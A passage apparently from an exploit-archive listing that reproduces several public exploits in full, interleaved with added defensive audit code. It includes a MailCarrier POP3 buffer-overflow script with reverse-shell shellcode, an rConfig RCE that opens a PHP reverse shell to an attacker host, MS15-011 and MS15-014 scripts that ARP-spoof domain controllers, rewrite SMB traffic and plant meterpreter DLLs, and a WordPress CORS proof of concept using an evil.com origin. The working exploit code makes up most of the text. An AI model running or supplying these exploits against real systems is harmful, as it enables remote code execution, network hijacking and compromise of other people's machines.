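    session_user: Optional[str] = None  # None = no Jira session (unauthenticated)


# Constructed in-memory stand-ins for the plug-in's data.
NOTIFICATIONS = {
    "alice": ["PROJ-1: comment added", "PROJ-7: assigned to you"],
    "bob": ["OPS-3: issue resolved"],
}
PROJECTS = {"PROJ": {"alice"}, "OPS": {"bob"}, "SECRET": {"carol"}}  # project -> users allowed to browse it
USERS = {"alice", "bob", "carol", "admin"}
ADMINS = {"admin"}


def authorized(owner_param=None):
    """Authorization gate applied before a handler produces any reply:
    1. reject callers without a session (401);
    2. if the handler acts on behalf of a named user (owner_param), the
       caller must be that user or an admin (403)."""
    def decorator(handler):
        @wraps(handler)
        def wrapper(req):
            if req.session_user is None:
                return 401, []
            if owner_param is not None:
                target = req.params.get(owner_param, "")
                if target != req.session_user and req.session_user not in ADMINS:
                    return 403, []
            return handler(req)
        return wrapper
    return decorator


def push_notification_vulnerable(req):
    """Reported behaviour (SYSS-2019-041): the username parameter alone selects
    whose notifications are returned; the caller's identity is never consulted."""
    return 200, NOTIFICATIONS.get(req.params.get("username", ""), [])


@authorized(owner_param="username")
def push_notification(req):
    """Fixed PushNotification: only the named user (or an admin) gets the list."""
    return 200, NOTIFICATIONS.get(req.params.get("username", ""), [])


@authorized()
def project_filter(req):
    """SYSS-2019-042: besides requiring a session, restrict the project list to
    projects the caller may browse instead of returning all of them."""
    q = req.params.get("searchQuery", "").lower()
    visible = [p for p, members in PROJECTS.items()
               if (req.session_user in members or req.session_user in ADMINS)
               and q in p.lower()]
    return 200, visible


@authorized()
def user_filter(req):
    """SYSS-2019-043: user-name lookup is limited to logged-in callers (a real
    Jira deployment would additionally check the Browse Users permission)."""
    q = req.params.get("searchQuery", "")
    return 200, sorted(u for u in USERS if q in u)


if __name__ == "__main__":
    anon = Request("/plugins/servlet/nfj/PushNotification", {"username": "alice"})
    print("vulnerable, anonymous:", push_notification_vulnerable(anon))
    print("fixed, anonymous:     ", push_notification(anon))
    print("fixed, as bob:        ", push_notification(Request(anon.path, anon.params, "bob")))
    print("fixed, as alice:      ", push_notification(Request(anon.path, anon.params, "alice")))
```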

WebKit HTMLFrameElementBase::isURLAllowed Universal Cross Site Scripting

Microsoft Windows Insecure CSharedStream Object Privilege Escalation


Win10 MailCarrier 2.51 Buffer Overflow


Win10 MailCarrier version 2.51 POP3 User remote buffer overflow exploit.


MD5 | c479d83a3653b09d10f592d1df3e7b74

# Exploit Title: Win10 MailCarrier 2.51 - 'POP3 User' Remote Buffer Overflow
# Date: 2019-10-01
# Author: Lance Biggerstaff
# Original Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.tabslab.com/
# Version: 2.51
# Tested on: Windows 10
# Note: Every version of Windows 10 has a different offset ¯\_(ツ)_/¯

#!/usr/bin/python

import sys
import socket
import time

#msfvenom -p windows/shell/reverse_tcp lhost=IP_ADDRESS lport=LISTENING_PORT -b '\x00\xd9' -f python

buf = ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xe7\xb4\xfe\x5c\x83\xee\xfc\xe2\xf4\x1b\x5c"
buf += "\x7c\x5c\xe7\xb4\x9e\xd5\x02\x85\x3e\x38\x6c\xe4\xce"
buf += "\xd7\xb5\xb8\x75\x0e\xf3\x3f\x8c\x74\xe8\x03\xb4\x7a"
buf += "\xd6\x4b\x52\x60\x86\xc8\xfc\x70\xc7\x75\x31\x51\xe6"
buf += "\x73\x1c\xae\xb5\xe3\x75\x0e\xf7\x3f\xb4\x60\x6c\xf8"
buf += "\xef\x24\x04\xfc\xff\x8d\xb6\x3f\xa7\x7c\xe6\x67\x75"
buf += "\x15\xff\x57\xc4\x15\x6c\x80\x75\x5d\x31\x85\x01\xf0"
buf += "\x26\x7b\xf3\x5d\x20\x8c\x1e\x29\x11\xb7\x83\xa4\xdc"
buf += "\xc9\xda\x29\x03\xec\x75\x04\xc3\xb5\x2d\x3a\x6c\xb8"
buf += "\xb5\xd7\xbf\xa8\xff\x8f\x6c\xb0\x75\x5d\x37\x3d\xba"
buf += "\x78\xc3\xef\xa5\x3d\xbe\xee\xaf\xa3\x07\xeb\xa1\x06"
buf += "\x6c\xa6\x15\xd1\xba\xdc\xcd\x6e\xe7\xb4\x96\x2b\x94"
buf += "\x86\xa1\x08\x8f\xf8\x89\x7a\xe0\x3d\x16\xa3\x37\x0c"
buf += "\x6e\x5d\xe7\xb4\xd7\x98\xb3\xe4\x96\x75\x67\xdf\xfe"
buf += "\xa3\x32\xde\xf4\x34\x27\x1c\xec\x59\x8f\xb6\xfe\x5c"
buf += "\xf2\x3d\x18\x0c\xb7\xe4\xae\x1c\xb7\xf4\xae\x34\x0d"
buf += "\xbb\x21\xbc\x18\x61\x69\x36\xf7\xe2\xa9\x34\x7e\x11"
buf += "\x8a\x3d\x18\x61\x7b\x9c\x93\xbe\x01\x12\xef\xc1\x12"
buf += "\xb4\x80\xb4\xfe\x5c\x8d\xb4\x94\x58\xb1\xe3\x96\x5e"
buf += "\x3e\x7c\xa1\xa3\x32\x37\x06\x5c\x99\x82\x75\x6a\x8d"
buf += "\xf4\x96\x5c\xf7\xb4\xfe\x0a\x8d\xb4\x96\x04\x43\xe7"
buf += "\x1b\xa3\x32\x27\xad\x36\xe7\xe2\xad\x0b\x8f\xb6\x27"
buf += "\x94\xb8\x4b\x2b\xdf\x1f\xb4\x83\x74\xbf\xdc\xfe\x1c"
buf += "\xe7\xb4\x94\x5c\xb7\xdc\xf5\x73\xe8\x84\x01\x89\xb0"
buf += "\xdc\x8b\x32\xaa\xd5\x01\x89\xb9\xea\x01\x50\xc3\xbb"
buf += "\x7b\x2c\x18\x4b\x01\xb5\x7c\x4b\x01\xa3\xe6\x77\xd7"
buf += "\x9a\x92\x75\x3d\xe7\x17\x01\x5c\x0a\x8d\xb4\xad\xa3"
buf += "\x32\xb4\xfe\x5c"

jmpesp = '\x23\x49\xA1\x0F'

#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5093 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
buffer = '\x41' * 5095 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5097 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)
#buffer = '\x41' * 5099 + jmpesp + '\x90' * 20 + buf + '\x43' * (5096 - 4 - 20 - 1730)

print "[*] MailCarrier 2.51 POP3 Buffer Overflow in USER command\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect(("192.168.121.87", 110))
print s.recv(1024)
s.send('USER ' + buffer + '\r\n')
print s.recv(1024)
s.send('QUIT\r\n')
s.close()
time.sleep(1)
print "[*] Done, but if you get here the exploit failed!"

rConfig 3.9.2 Remote Code Execution


rConfig version 3.9.2 suffers from a remote code execution vulnerability.


MD5 | 2dc764b912bb271d4a13e36dc91a18ba

# Exploit Title: rConfig 3.9.2 - Remote Code Execution
# Date: 2019-09-18
# Exploit Author: Askar
# Vendor Homepage: https://rconfig.com/
# Software link: https://rconfig.com/download
# Version: v3.9.2
# Tested on: CentOS 7.7 / PHP 7.2.22
# CVE : CVE-2019-16662

#!/usr/bin/python

import requests
import sys
from urllib import quote
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

if len(sys.argv) != 4:
    print "[+] Usage : ./exploit.py target ip port"
    exit()

target = sys.argv[1]

ip = sys.argv[2]

port = sys.argv[3]

payload = quote(''';php -r '$sock=fsockopen("{0}",{1});exec("/bin/sh -i <&3 >&3 2>&3");'#'''.format(ip, port))

install_path = target + "/install"

req = requests.get(install_path, verify=False)
if req.status_code == 404:
    print "[-] Installation directory not found!"
    print "[-] Exploitation failed !"
    exit()
elif req.status_code == 200:
    print "[+] Installation directory found!"
url_to_send = target + "/install/lib/ajaxHandlers/ajaxServerSettingsChk.php?rootUname=" + payload

print "[+] Triggering the payload"
print "[+] Check your listener !"

requests.get(url_to_send, verify=False)



Intelligent Security System SecurOS Enterprise 10.2 Unquoted Service Path


Intelligent Security System SecurOS Enterprise version 10.2 suffers from a SecurosCtrlService unquoted service path vulnerability.


MD5 | d9081058c662d2b3c1302de345d620bd

# Exploit Title: Intelligent Security System SecurOS Enterprise 10.2 - 'SecurosCtrlService' Unquoted Service Path
# Discovery Date: 2019-10-28
# Exploit Author: Alberto Vargas
# Vendor Homepage: https://www.issivs.com/product-detail/secure-os-enterprise/
# Software Link: https://www.issivs.com/schedule-a-free-demo/ (trial version for unlicensed users)
# Version: 10.2 R1
# Tested on: Windows 10 Pro x64 Esp

# Version: 10.0.18362

# Schedule A Free Demo - ISS - Intelligent Security Systems<https://www.issivs.com/schedule-a-free-demo/>
# Schedule a Free Demo A leading developer of security surveillance and control systems for
# networked digital video and audio recording, video image pattern processing and digital data transmission.
# www.issivs.com

# Summary: ISS’ global standard for video management, access control and video analytics, SecurOS™ Enterprise is perfectly suited for
# managing large and demanding installations. The Enterprise framework can manage and monitor an unlimited number of cameras and devices, apply
# intelligent video analytics, and act as an integration platform for a variety of 3rd party systems. Built to handle enterprise level deployments,
# SecurOS Enterprise, comes with built-in Native Failure functionality, Microsoft Active Directory / LDAP integration, and has an extensive set
# of Cybersecurity features making it one of the most reliable and secure video management platforms in the market today. SecurOS Enterprise
# supports all the features of the other 3 editions.

# Description: The application suffers from an unquoted search path issue impacting the service 'SecurosCtrlService'. This could potentially allow an
# authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require
# the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could
# potentially be executed during application startup or reboot. If successful, the local user’s code would execute with the elevated privileges
# of the application.

# Step to discover the unquoted Service:

C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """

SecurOS Control Service    SecurosCtrlService    C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe    Auto

# Service info:

C:\Users\user>sc qc SecurosCtrlService
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: SecurosCtrlService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ISS\SecurOS\securos_svc.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : SecurOS Control Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
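As an added example (not from the advisory): the check the wmic and sc queries above perform by eye, applied offline to constructed rows in the shape of wmic's /format:csv output. For each unquoted image path containing a space it reports the file names the service control manager would try before the intended executable (the directories holding them are the ones whose ACLs must deny write access to standard users) and the sc config command that quotes the path.

```python
import csv
import io
import re

# Constructed rows in the shape of
#   wmic service get displayname,name,pathname,startmode /format:csv
# (a Node column first, then the requested columns in alphabetical order).
SAMPLE_WMIC_CSV = "\n".join([
    "Node,DisplayName,Name,PathName,StartMode",
    "WKS01,SecurOS Control Service,SecurosCtrlService,"
    "C:\\Program Files (x86)\\ISS\\SecurOS\\securos_svc.exe,Auto",
    "WKS01,Windows Update,wuauserv,C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p,Manual",
    'WKS01,Demo Quoted Service,DemoQuoted,"""C:\\Program Files\\Demo Vendor\\demo_svc.exe"" --service",Auto',
])

# An unquoted PathName is read up to the first executable extension; what
# follows is treated as arguments.
IMAGE_RE = re.compile(r"^(?P<exe>.+?\.(?:exe|sys|dll|bat|cmd))(?:\s+(?P<args>.*))?$", re.I)


def split_image_path(pathname):
    """Split a service PathName into (executable, arguments)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        end = pathname.find('"', 1)
        return pathname[1:end], pathname[end + 1:].strip()
    m = IMAGE_RE.match(pathname)
    if m is None:
        return pathname, ""
    return m.group("exe"), m.group("args") or ""


def is_unquoted_with_spaces(pathname):
    """True when the image path is not quoted and contains a space, the
    condition under which the service control manager's lookup is ambiguous."""
    exe, _ = split_image_path(pathname)
    return not pathname.strip().startswith('"') and " " in exe


def ambiguous_lookups(exe):
    """File names Windows tries, in order, before the intended executable:
    each prefix ending at a space, with .exe appended."""
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def quoted_binpath(pathname):
    """The same image path with the executable part quoted."""
    exe, args = split_image_path(pathname)
    return ('"%s" %s' % (exe, args)).strip()


def sc_config_fix(service, pathname):
    """'sc config' command that rewrites the path with quotes in place; the
    inner quotes are backslash-escaped as sc.exe expects (run as administrator)."""
    inner = quoted_binpath(pathname).replace('"', '\\"')
    return 'sc config %s binPath= "%s"' % (service, inner)


def audit_wmic_csv(text):
    """Return one finding per service whose PathName is unquoted and contains a space."""
    findings = []
    for row in csv.DictReader(io.StringIO(text)):
        path = row["PathName"]
        if is_unquoted_with_spaces(path):
            exe, _ = split_image_path(path)
            findings.append({
                "service": row["Name"],
                "start_mode": row["StartMode"],
                "lookups": ambiguous_lookups(exe),
                "fix": sc_config_fix(row["Name"], path),
            })
    return findings


if __name__ == "__main__":
    for finding in audit_wmic_csv(SAMPLE_WMIC_CSV):
        print(finding)
```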

Microsoft Windows Server 2012 Group Policy Remote Code Execution


Microsoft Windows Server 2012 suffers from a Group Policy remote code execution vulnerability.


MD5 | 19d9f8bceae9d13ea92a5d4a9528b318

# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012,
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows

# Description: While there exists multiple advisories for the vulnerability and video demos of
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).

#!/usr/bin/python3

import argparse
import os
import subprocess
import socket
import fcntl
import struct

# MS15-011 Exploit.
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.

def arpSpoof(interface, hostIP, targetIP):
    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
    arpArgs = arpCmd.split()
    print("Arpspoofing: %s" % (arpArgs))
    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)


def karmaSMB(hostIP):
    print("reverting GptTmpl.inf from bak")
    os.system("cp GptTmpl.inf.bak GptTmpl.inf")
    appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
    CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
    f = open("GptTmpl.inf", "a", encoding='utf-16le')
    f.write(appInit)
    f.write(CURunKey)
    f.close()

    path = os.getcwd()

    fConfig = open("smb.conf", "w")
    fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
    fConfig.close()

    karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
    os.system(karmaCmd)


def iptables_config(targetIP, hostIP):
    print('[+] Running command: echo "1"> /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
    os.system('echo "1"> /proc/sys/net/ipv4/ip_forward')
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')


def get_interface_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])


def generatePayload(lhost, lport):
    print("generating payload(s) and metasploit resource file")
    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
    os.system(msfDll)
    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
    print("metasploit resource script: %s" % msfResource)
    print("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")

    file = open("meta_resource.rc", "w+")
    file.write(msfResource)
    file.close()


if __name__ == '__main__':

    parser = argparse.ArgumentParser()

    # Add arguments
    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain controllers are present.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
    parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
    parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)

    args = parser.parse_args()

    # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
    print("checking for missing file(s)")
    if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
        print("Requirements missing. Downloading required files from github")
        os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
        os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")

    # Get the provided interface's IP address
    ipAddr = get_interface_address(args.interface)

    if args.lhost is not None:
        lhost = args.lhost
    else:
        lhost = ipAddr

    if args.lport is not None:
        lport = args.lport
    else:
        lport = '4444'


    dcSpoof = ""
    dcCommaList = ""
    count = 0

    # loop over the domain controllers, poison each and target the host IP
    # create a comma separated list of DC's
    # create a "-t" separated list of DC's for use with arpspoof
    for dc in args.domain_controller:
        dcSpoof += "-t %s " % (dc)
        if count > 0:
            dcCommaList += ",%s" % (dc)
        else:
            dcCommaList += "%s" % (dc)

        arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
        count += 1

    # arpspoof the target and all of the DC's
    arpSpoof(args.interface, args.target_ip, dcSpoof)

    # generate payloads
    generatePayload(lhost, lport)

    # Setup iptables forwarding rules
    iptables_config(args.target_ip, ipAddr)

    # run Karma SMB server
    karmaSMB(ipAddr)


    # dcCommaList holds the comma separated DC list built above
    print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, dcCommaList))
    print("If you interrupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")
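
The script above appends AppInit_DLLs and Run values pointing at a UNC path to GptTmpl.inf. As an added example from the defender's side (not part of the original exploit or of any Microsoft tool), a Python audit that decodes a GptTmpl.inf, walks its [Registry Values] section and flags persistence keys and UNC-path values, which is what a tampered template looks like; the sample template is constructed, with 192.0.2.10 as a placeholder host.

```python
import re
from typing import List, Tuple

# Constructed GptTmpl.inf: a benign SMB-signing setting followed by the two values
# the exploit above appends (host 192.0.2.10 is a placeholder). Real templates are
# UTF-16LE with a byte-order mark, which is how the file is built here.
SAMPLE_INF = ("\ufeff" + "\r\n".join([
    "[Unicode]",
    "Unicode=yes",
    "[Version]",
    'signature="$CHICAGO$"',
    "Revision=1",
    "[Registry Values]",
    "MACHINE\\System\\CurrentControlSet\\Services\\LanManServer\\Parameters\\RequireSecuritySignature=4,1",
    "MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,\"\\\\192.0.2.10\\SYSVOL\\share.dll\"",
    "MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,\"rundll32.exe \\\\192.0.2.10\\SYSVOL\\share.dll\",1",
]) + "\r\n").encode("utf-16-le")

# Registry locations a security template has no business pointing at executables:
# code loaded into every process, or programs run at logon.
PERSISTENCE_KEYS = (
    "\\currentversion\\windows\\appinit_dlls",
    "\\currentversion\\run\\",
    "\\currentversion\\runonce\\",
)

# \\host\share\... : a network location the client would load code from
UNC_RE = re.compile(r"\\\\[^\\\s\"']+\\")


def parse_registry_values(inf_bytes: bytes) -> List[Tuple[str, str, str]]:
    """Return (key, type, value) rows from the [Registry Values] section.
    Rows have the form  key=type,value  with type 1 = REG_SZ, 4 = REG_DWORD."""
    text = inf_bytes.decode("utf-16")  # consumes the BOM
    section = None
    rows = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "registry values" or "=" not in line:
            continue
        key, _, rest = line.partition("=")
        rtype, _, value = rest.partition(",")
        rows.append((key.strip(), rtype.strip(), value.strip()))
    return rows


def audit_gpttmpl(inf_bytes: bytes) -> List[str]:
    """One finding per row that sets a persistence key or references a UNC path."""
    findings = []
    for key, _rtype, value in parse_registry_values(inf_bytes):
        k = key.lower()
        if any(marker in k for marker in PERSISTENCE_KEYS):
            findings.append("persistence key set by policy: %s=%s" % (key, value))
        elif UNC_RE.search(value):
            findings.append("UNC path in policy value: %s=%s" % (key, value))
    return findings


if __name__ == "__main__":
    for finding in audit_gpttmpl(SAMPLE_INF):
        print("[!] " + finding)
```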

Microsoft Windows Server 2012 Group Policy Security Feature Bypass


Microsoft Windows Server 2012 suffers from a Group Policy security feature bypass vulnerability.


MD5 | 0beb75f489ff7b7e008f70ed3e84ded8

# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Security Feature Bypass
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2,
# Windows 8, Windows Server 2012, Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0009
# Type: Remote
# Platform: Windows

# Description: This exploit code targets vulnerable systems in order to corrupt GPO updates which causes
# the target system to revert various security settings to their default settings. This includes SMB server
# and network client settings, which by default do not require SMB signing except for domain controllers.
# Successful exploitation against a system with a hardened configuration that requires SMB Signing by the
# network client will make the target system vulnerable to MS15-011, which can lead to remote code execution.

#!/usr/bin/python3

import argparse
import fcntl
import os
import socket
import struct
import subprocess
from subprocess import PIPE
import re

# MS15-014 Exploit.
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-014
# Example usage: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-014.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.

def arpSpoof(interface, hostIP, targetIP):
    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
    arpArgs = arpCmd.split()
    print("Arpspoofing: %s" % (arpArgs))
    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)


def corrupt_packet():
    global count

    # NetSed listen port 446 (iptables redirected), modify traffic, then forward to destination 445.
    netsedCmd = "netsed tcp 446 0 445 s/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00/%00%5c%00%4d%00%61%00%63%00%68%00%69%00%6e%00%65%00%5c%00%4d%00%69%00%63%00%72%00%6f%00%73%00%6f%00%66%00%74%00%5c%00%57%00%69%00%6e%00%64%00%6f%00%77%00%73%00%20%00%4e%00%54%00%5c%00%53%00%65%00%63%00%45%00%64%00%69%00%74%00%5c%00%47%00%70%00%74%00%54%00%6d%00%70%00%6c%00%2e%00%69%00%6e%00%66%00%00" #>/dev/null 2>&1 &
    netsedArgs = netsedCmd.split()
    print("Starting NetSed!")
    print("NetSed: %s" % (netsedArgs))
    netsedP = subprocess.Popen(netsedArgs, stdout=PIPE, stderr=subprocess.STDOUT)


    while True:
        o = (netsedP.stdout.readline()).decode('utf-8')

        if o != '':
            if args['verbose']:
                print("NetSed output: %s" % o)

            if re.search('Applying rule', o) is not None:
                count += 1
                print('packet corrupted: %s' % count)
                # During testing, after 4 attempts to retrieve GptTmpl.inf the exploit was successful. Sometimes the machine requested the file 7 times, but exploitation was always successful after 4 attempts.
                # The script waits for up to 7 corrupted packets for reliability. Tested on Windows 7 SP1 and Server 2012 R2
                if count == 4:
                    print("Exploit has likely completed!! waiting for up to 7 corrupted packets for reliability. \nIf no more packets are corrupted in the next couple of minutes kill this script. The target should be reverted to default settings with SMB signing not required on the client. \nTarget can now be exploited with MS15-011 exploit.")

                # During testing, after 7 attempts to retrieve GptTmpl.inf the GPO update stopped and exploitation was successful.
                if count == 7:
                    break


def get_interface_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])


def iptables_config(targetIP, hostIP):
    # allow forwarding, redirect arpspoofed traffic from dport 445 to 446 for NetSed.
    print('[+] Running command: echo "1"> /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')
    print('[+] Make sure to cleanup iptables after exploit completes')
    os.system('echo "1"> /proc/sys/net/ipv4/ip_forward')
    os.system('iptables -t nat -A PREROUTING -p tcp --dport 445 -j REDIRECT --to-port 446')


if __name__ == '__main__':

    parser = argparse.ArgumentParser(description='Find the SecEdit\\GptTmpl.inf UUID to exploit MS15-014')
    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-014", required=True)
    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller in the target domain. Use this argument multiple times when multiple domain controllers are present.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
    parser.add_argument("-v", "--verbose", help="Toggle verbose mode. displays all output of NetSed, very busy terminal if enabled.", action='store_true')

    args = vars(parser.parse_args())

    target_ip = args['target_ip']

    count = 0

    # Get the provided interface's IP address
    ipAddr = get_interface_address(args['interface'])

    dcSpoof = ""
    dcCommaList = ""
    dcCount = 0

    # loop over the domain controllers, poison each and target the host IP
    # create a comma separated list of DC's
    # create a "-t" separated list of DC's for use with arpspoof
    for dc in args['domain_controller']:
        dcSpoof += "-t %s " % (dc)
        if dcCount > 0:
            dcCommaList += ",%s" % (dc)
        else:
            dcCommaList += "%s" % (dc)

        arpSpoof(args['interface'], dc, "-t %s" % (target_ip))
        dcCount += 1

    # arpspoof the target and all of the DC's
    arpSpoof(args['interface'], target_ip, dcSpoof)

    # Setup iptables forwarding rules
    iptables_config(target_ip, ipAddr)

    # identify requests for GptTmpl.inf and modify the packet to corrupt it using NetSed.
    corrupt_packet()

WordPress 5.2.4 Cross Origin Resource Sharing


WordPress version 5.2.4 fails to validate an origin header.


MD5 | 1db094f57934f8621b34b78783495b19

# Exploit Title: Wordpress 5.2.4 - Cross-Origin Resource Sharing
# Date: 2019-10-28
# Exploit Author: Milad Khoshdel
# Software Link: https://wordpress.org/download/
# Version: Wordpress 5.2.4
# Tested on: Linux Apache/2 PHP/7.2

# Vulnerable Page:
https://[Your-Domain]/wp-json

# POC:
# The web application fails to properly validate the Origin header (check Details section for more information)
# and returns the header Access-Control-Allow-Credentials: true. In this configuration any website can issue
# requests made with user credentials and read the responses to these requests. Trusting arbitrary
# origins effectively disables the same-origin policy, allowing two-way interaction by third-party web sites.

# REQUEST -->

GET /wp-json/ HTTP/1.1
Origin: https://www.evil.com
Accept: */*
Accept-Encoding: gzip,deflate
Host: [Your-Domain]
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Connection: Keep-alive

# RESPONSE -->

HTTP/1.1 200 OK
Date: Mon, 28 Oct 2019 07:34:39 GMT
Server: NopeJS
X-Robots-Tag: noindex
Link: <https://[Your-Domain].com/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
